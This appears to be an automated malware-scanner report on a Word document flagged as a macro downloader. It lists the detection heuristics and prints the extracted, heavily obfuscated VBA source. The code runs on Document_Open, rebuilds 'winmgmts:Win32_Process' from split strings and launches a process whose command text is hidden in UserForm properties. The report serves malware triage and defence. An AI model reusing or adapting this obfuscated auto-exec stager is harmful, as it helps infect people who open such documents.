MALICIOUS
232
Risk Score
Heuristics 8
-
ClamAV: Doc.Downloader.Sagent-7465099-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Sagent-7465099-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGERVBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.Matched line in script
Gmrruxtnv = Join(Split("23nNNgi3_7&&jjNN#" + "win23nNNgi3_7&&jjNN#mg23nNNgi3_7&&jjNN#mt23nNNgi3_7&&" + "jjNN#s:23nNNgi3_7&&jjNN#Wi23nNNgi3_7&&jjNN#n323" + "nNNgi3_7&&jjNN#2_23nNNgi3_7&&jjNN#", hb32bmmejdn), "") + Bhhujcbq.Guqlecwzw + "rocess" -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set Htnnhzcl = VBA.CreateObject(JJKBSKJ + Gmrruxtnv) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_open() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11036 bytes |
SHA-256: a70c818013bc4aa9e164ecbb4ba43e0ffe40f72bacf7186788ebab95c41222ef |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
301 of 514 identifiers look randomly generated (e.g. 'Xbsfnwonrotla') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Bhhujcbq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Guqlecwzw, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Wqhxgpmwiqeve = Xbbotshmi
Vqsdhzec = 396
Oabjzfnve = ("Eos.")
Ueivmgxho = (656)
Dim Getvdfjfrbwzj As String
Dim Ftnurdovblkhv As Boolean
Dim Vneptxpeb As Integer
Dim Zlfyfyvmbd As Boolean
Dim Murjsktxomjg As Integer
Dim Uhcppmnfedqc As Integer
Dim Mirdburubo As Boolean
Hjxnbypjenkm = (583)
Dim Ghqnsqdil As Boolean
Gfodafnsvedh = ("Est tempora recusandae.")
Rmwgyyfo = (909)
Dim Jenvgqyystu As String
Feiwttcc = Lbdhbngorlatv
Leffoxhylqcq = Vqljecudjx
Edialiqeio = "Ut laborum asperiores adipisci neque aut voluptas."
Lbddsqzxecwup = 293
Rnjpdlae = Vnsbliid
Wavrxtqcsvtq = 61
Fnpnynpxyb = ("Amelia")
Byrvyori = (925)
Dim Ssskuxmtkfr As Integer
Dim Ysvelcyctcvr As String
Dim Wxeznfpvxv As Double
Dim Rkeqjjvdtccj As Boolean
Dim Ioyqwtdmq As String
Dim Geagdvaqt As String
Dim Ycsmvoruvvt As String
Bwgyuoeuildfv = (180)
Dim Gcsmvuqwxkx As Integer
Vaknwdegpbve = ("Earum.")
Prohaqansdgm = (320)
Dim Aioxzjyibq As Boolean
Sjrbwhpaaej = Yvihggjatggmy
Uhqyyjyqvrgzx = Vzlaaoqauk
Ydloycsgtok = "Iste rerum adipisci fuga."
Aenqahmzjlg = 172
Xbsfnwonrotla = Kttpxxvjlnj
Yuteibyzsgn = 967
Rztfitowi = ("Est.")
Ktccsgrehypxv = (521)
Dim Yrrrmfbq As Boolean
Dim Pgfpatpmuuozw As String
Dim Pjghccyqeu As Boolean
Dim Qvticvfca As Integer
Dim Hfzkavpzukf As Boolean
Dim Vjeurqavdnzr As String
Dim Ldqeldvzcc As Double
Upucvkyyntrll = (134)
Dim Sdratzjdwd As String
Tavgbdtvkabs = ("Id repudiandae dolore eum numquam voluptas.")
Cyrlftbrcvkc = (913)
Dim Llyyqqexrnqis As Double
Sbzlaxlm = Ltbyavyeukybd
Oegevxalrjtlr = Zzoaewdz
Rdxfcqyxmlsf = "Sit blanditiis ducimus."
Akhkogkhgtk = 61
Pihlzkcicga
End Sub
Attribute VB_Name = "Vyeoqakxxt"
Attribute VB_Base = "0{9073FB39-2E1C-4746-83A2-96A69A51531E}{01A1C874-C51B-4ABD-824F-0A2D001C09C8}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Oinarhrpwwxy"
Function Ujjteelnxf()
Iczpkrbxsfrj = Cboniugn
Rdyqpfkuf = 738
Pxftmuoc = ("Alton")
Hogqsoqjmou = (794)
Dim Xhskinuxeham As Double
Dim Tvzrlcqkor As Integer
Dim Rtktripehmtjf As Boolean
Dim Sdhfdoewn As Boolean
Dim Jxcmsakmvanlq As Integer
Dim Abhcpmvwyhhmw As Boolean
Dim Wwgtysbuts As Boolean
Uferrmhodplx = (504)
Dim Bdfloneidre As Integer
Eygnjptbqtpq = ("Ellen")
Ujhkjjkqyph = (261)
Dim Plbnmvscqw As Double
Hrmkkpvp = Zwgvmknzrf
Eqpgcugm = Ficsxgozmon
Fgriipqevv = "Pariatur veniam beatae iste vitae ea voluptates enim."
Wvdnailglrx = 453
Ewajapcv = Bhhujcbq.Guqlecwzw
Gwfxeyindhu = Noolpphajhbdh
Vtwkoathq = 631
Auafomnnd = ("Sequi aperiam expedita deleniti suscipit corporis inventore.")
Vthomxoeuw = (498)
Dim Sjkkfyug As Integer
Dim Hpnadtopuvli As Double
Dim Caovtmzm As Double
Dim Hwdbioinodm As Boolean
Dim Luvpebes As String
Dim Iifkznlrvo As Boolean
Dim Gqnhgmyuupjz As Double
Xwvkwyyl = (318)
Dim Cejzdlrdetne As Integer
Vrupqsyghypow = ("Alberto")
Yuvvuebdyqiy = (701)
Dim Jmtuypfdiubu As Double
Lkppglfysjist = Zitslylwuyvn
Btzifsobts = Kujmfwrijmi
Yanurlxkmq = "Vitae."
Knvhypbxvn = 938
Anrqtfgp = Ewajapcv + Vyeoqakxxt.Qvtysshpkvvk + Vyeoqakxxt.Mcgxwclnbn + Vyeoqakxxt.Raokfqzn
Izugkvgxkaej = Fnonjqyisl
Ksmawuuv = 791
Xbrvovzmbpv = ("Alison")
Uokrwuah = (570)
Dim Kknljdjpepqpm As Double
Dim Bcigksexrrm As String
Dim Xbthodhk As Boolean
Dim Qiraqxlebo As Integer
Dim Srayffnwtxqg As Boolean
Dim Wjbioczs As Boolean
Dim Ssnzgnkyycjbg As Boolean
Bxfqsskjnbbdt = (380)
Dim Vzydgmro As Integer
Nshouudlj = ("Leo")
Ubafhjaxe = (969)
Dim Yxhjcdjmjjp As Integer
Adutgyrjm = Xyxydrql
Tkgkrabxdwfrv = Ohrgshmb
Dflissdpih = "Ut et."
Ioxqlizwgds = 196
Xuqwgcezqphh = Anrqtfgp + Vyeoqakxxt.Fppravids + Vyeoqakxxt.Kyqvjoudjwp.Factoid
Fpbjrhfxw = Aydwqnubbt
Oyxhbwvrytub = 119
Eqrpfmaesyyq = ("Eileen")
Kayosxnkuze = (816)
Dim Lmhebvxi As String
Dim Mnarjgyjky As Boolean
Dim Yvfjdftws As String
Dim Mprltxvaf As Double
Dim Masgdevqtct As String
Dim Lyrrsohqain As Double
Dim Uempxczhjfrx As Double
Bcrdtkczvfd = (740)
Dim Zalseekjqde As Boolean
Fgctzuqzgoj = ("Quo est voluptates qui debitis.")
Qqvjglqmzhym = (477)
Dim Rfkymycfvxbg As Integer
Qtlbnjouogw = Dgzehlbztvq
Sluyiabzv = Wyeexrebtkyzw
Uhrxyufhqcaq = "Consequatur temporibus."
Rpiadhihxbbqp = 922
Ujjteelnxf = Aabasifsnt + Xuqwgcezqphh + Aabasifsnt
Plvwvanucwrk = Qisfbndjikq
Mxgozgztfgebo = 623
Jyyktpxxolth = ("Darin")
Clfadaxwh = (696)
Dim Wvlboemw As Integer
Dim Klgbhozs As Integer
Dim Zincvyakq As Double
Dim Qggwtmvahgk As Integer
Dim Szyzvmxde As Integer
Dim Ohigpdcgk As Boolean
Dim Ezeocerwzozi As Integer
Abodzjmucild = (795)
Dim Deeysyvyuh As String
Lhnpozykpbnc = ("Erin")
Hkxwczpg = (971)
Dim Kaplabghugxe As Integer
Tmfevcrbon = Byfkdfpsfo
Kovghegcdld = Lkqdimbtqaib
Roogecst = "Odit sunt et quis minus ratione tempora."
Ltjhohpup = 577
End Function
Function Pihlzkcicga()
Fkfzdcfhjo = Otqaceobhkii
Odklvcigxh = 300
Ltpmudstwzeca = ("Maiores alias dolorem iure quam autem culpa minus dolores et.")
Pdvbwxrnbx = (614)
Dim Nnivjoetvlvq As Boolean
Dim Iooyhlkrsdc As Boolean
Dim Btfooxkegod As Boolean
Dim Wspdhewfocy As Integer
Dim Miwuetdyczp As Boolean
Dim Ttlcakdto As String
Dim Ovxiknqh As Double
Lciljkrpuszgb = (24)
Dim Tlcnzvxq As Double
Jwuopiimh = ("Qui enim ipsa aliquam ab facilis.")
Drqalduzbit = (761)
Dim Qbotldnmn As String
Oxbekrtudlqul = Rcqtwpjoynu
Dueqlqmo = Okpzjuzhchx
Vujkeidrpc = "Qui."
Igajuazpmbj = 944
hb32bmmejdn = "23nNNgi3_7&&jjNN#"
Gmrruxtnv = Join(Split("23nNNgi3_7&&jjNN#" + "win23nNNgi3_7&&jjNN#mg23nNNgi3_7&&jjNN#mt23nNNgi3_7&&" + "jjNN#s:23nNNgi3_7&&jjNN#Wi23nNNgi3_7&&jjNN#n323" + "nNNgi3_7&&jjNN#2_23nNNgi3_7&&jjNN#", hb32bmmejdn), "") + Bhhujcbq.Guqlecwzw + "rocess"
Gjriqmdi = Mvgfnith
Dwabqbyyqep = 770
Eocxbjzaho = ("Nesciunt.")
Pcdohakrbzj = (199)
Dim Spofsaovkbq As Double
Dim Rxcmvhqmby As Double
Dim Idfzjffshj As Integer
Dim Vonvseamdw As Boolean
Dim Podbsdrqtu As Integer
Dim Ivbwlsdidrrht As Integer
Dim Wxigmutkubdz As Double
Dsaeqmxcdbkt = (855)
Dim Xxwhxkusk As String
Cpkhvitypazqc = ("Laudantium rerum fugiat consequatur.")
Wtthvttlnx = (101)
Dim Cuxkhmhoxmvi As String
Uliygueonbyd = Jdxkqnqer
Evolkxlodyhd = Lqogwmdtcft
Sfapttgcyp = "Veniam."
Dnpofbai = 926
Set Htnnhzcl = VBA.CreateObject(JJKBSKJ + Gmrruxtnv)
Kuohwvlsn = Ksxohhfx
Lmzoabarlw = 821
Kjlkwuuiyiwus = ("Sean")
Pamttfvz = (153)
Dim Twtlabnlnhn As String
Dim Kldnldpewyxkr As String
Dim Vrpjdwdy As String
Dim Ygijeuqneciqr As Integer
Dim Sjxyvbjclqvsd As Integer
Dim Hncqnwgv As Double
Dim Hwnxtezg As Boolean
Mgaevoexsj = (697)
Dim Odvvnbvalo As Double
Oevfrlwmqnna = ("Cupiditate ea.")
Vyrjciauhjbyr = (236)
Dim Nyyafqrtzf As Integer
Qwapuipgxi = Xttwmdtuyb
Pahhdfsevvk = Thpcsmewm
Wugwlmootl = "Necessitatibus ipsum impedit et sed."
Bhcrqypcjvps = 580
Ndmpnxhpe = Gmrruxtnv + Vyeoqakxxt.Wmavoqxmgboj.ControlTipText + Vyeoqakxxt.Nrjoictfpsbhb.ControlTipText
Pusxrfkyrv = Qjzvswqisc
Yusqcpucz = 250
Asrhrydexulf = ("Nostrum eum.")
Wxizbsnhkyxm = (789)
Dim Cbkmxoycbpzjp As Boolean
Dim Nmozvgrmdya As String
Dim Isjeehcwjzid As String
Dim Wszrcorxljnz As Boolean
Dim Phoxheuigv As Integer
Dim Wtdnfvymv As String
Dim Gxsclgar As Boolean
Rgcklwszome = (822)
Dim Sytydradpwdh As Boolean
Cjbfdarembc = ("Qui facere distinctio alias aut unde voluptate ipsam.")
Gmhgzudzdriwa = (434)
Dim Ckydlhqqmga As Integer
Olrvirtq = Dmwpyrtidwd
Czjrqwua = Alranoikwu
Qprrysxxoynj = "Quas."
Zzdunofcvehr = 282
Vukrttxfex = Ndmpnxhpe + Bhhujcbq.Guqlecwzw
Hjbxxozmhbpse = Funeqkpubkv
Ycggobfg = 47
Bkrxjdomevoa = ("Praesentium minima dolor iste voluptate consequatur porro quidem quaerat molestias.")
Gqospanbk = (582)
Dim Fvjedhirbmu As Integer
Dim Frnxrjlyaa As String
Dim Mnqofzzsjeiei As Boolean
Dim Gjztmrbmymp As Boolean
Dim Nqeukgqu As Integer
Dim Wnugdaii As Double
Dim Vfoahmgkasb As Integer
Yftzoucltog = (866)
Dim Rkympebvf As Integer
Emxzftzb = ("Qui vel id quae atque quam rem repellat eaque.")
Vbkbunmecqixb = (680)
Dim Mocxossxsvbwc As Integer
Pfxgvjnkvqpqd = Glcesewdrgde
Tqjydbdzv = Zdhhzbpfzo
Ymusbgaseufb = "Blanditiis assumenda."
Szqphqert = 165
Set Pihlzkcicga = CreateObject(Vukrttxfex)
Rxequqqb = Tfuvrmbdriwxh
Bjyqybkpapfo = 721
Foxseidnji = ("Jacob")
Dfkhuqswsgslj = (601)
Dim Puglyctluz As Boolean
Dim Dqoaqzbx As Integer
Dim Supwcrzvm As Boolean
Dim Zntcwtvkuq As Double
Dim Nogdgclixdl As String
Dim Vbzblynxtd As Double
Dim Xtgfnkolgciw As Double
Tazmvcrrbrvj = (674)
Dim Uqtkeijifckt As Boolean
Fstcnsenyhi = ("Jeanette")
Fsokdbvq = (566)
Dim Xsfjluwbc As Integer
Miysvpng = Ceedqrsgsb
Kvkhjtscffu = Jqrilijxvvob
Ddvkebwyciog = "Fugit dicta dicta."
Phwjbjgaayg = 10
Pihlzkcicga.XSize = False
Xklvlkol = Attzmwskefew
Ktoywvtldgehl = 174
Nxpozpsz = ("Laborum dolores.")
Wdxwozbspksv = (888)
Dim Zzpqnvekwgr As Double
Dim Htgsuldaswo As Double
Dim Cpwllrhbp As Boolean
Dim Blhplgqegkuzi As String
Dim Klngdabgspnlv As Integer
Dim Orthqido As String
Dim Fjhwiposng As String
Iwyzfpaxvve = (760)
Dim Cgbcphxyuxquj As Double
Zshteaiwiqcnn = ("Eaque ut eligendi quis.")
Kfbzgjmqxzx = (244)
Dim Zhfwfaxcnlb As String
Ktmntkhenlsj = Ncktgluwakg
Towtaemztd = Nhjmvnmbl
Dsujynsbglxnp = "Ratione voluptates."
Sfrqtyznselk = 71
Pihlzkcicga.YSize = False
Mcaiommgwkw = Fzecguzoptrq
Kgicteuavqhg = 731
Spyzawtee = ("Deleniti magnam.")
Avzxijsytban = (528)
Dim Aaedouzs As Integer
Dim Avrqtzgcxjtiu As Double
Dim Hphjdsbqwz As Double
Dim Aqpticdxmrc As Double
Dim Vxpxjsfcrgfr As Boolean
Dim Dyeuqxkfmhp As String
Dim Qfzpncohv As Integer
Nhqmjjkbzmaz = (324)
Dim Likqkhhxmowrr As String
Uiimlhjgxwd = ("Pariatur laboriosam.")
Ltqgrsbterl = (554)
Dim Pubqrsrmee As Integer
Wpcbmugktm = Payrvpqxharof
Lgbgpztvd = Sxeurdcdaqtz
Nuewxowepvd = "Qui in laudantium dolor."
Cyweutdxt = 482
Do While Htnnhzcl.Create(UJNDB & Ujjteelnxf, Mfwatbva, Pihlzkcicga, Tpxiznofetm)
Loop
Kxfhjrufs = Vzlwjnsqktrah
Edpfolfu = 554
Stymdgeu = ("Omnis voluptate quia voluptas.")
Itxjxgumnsxx = (742)
Dim Mrpnamqed As String
Dim Ttegmngfcvl As String
Dim Ihrshofuh As String
Dim Mrqtocepdsdnp As Double
Dim Frsjjali As Integer
Dim Uxwpoxmzfuvw As Integer
Dim Zrvbneucmgj As String
Ykyailbu = (866)
Dim Apvrnklfi As Integer
Ksfjvays = ("Qui laborum ratione.")
Fzvopgtmllw = (431)
Dim Vmsngsbabj As String
Strnkccuqup = Yerswteq
Xcnszipequ = Mczaiuytawski
Iepwxkjtlx = "Henrietta"
Mbqygcar = 378
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.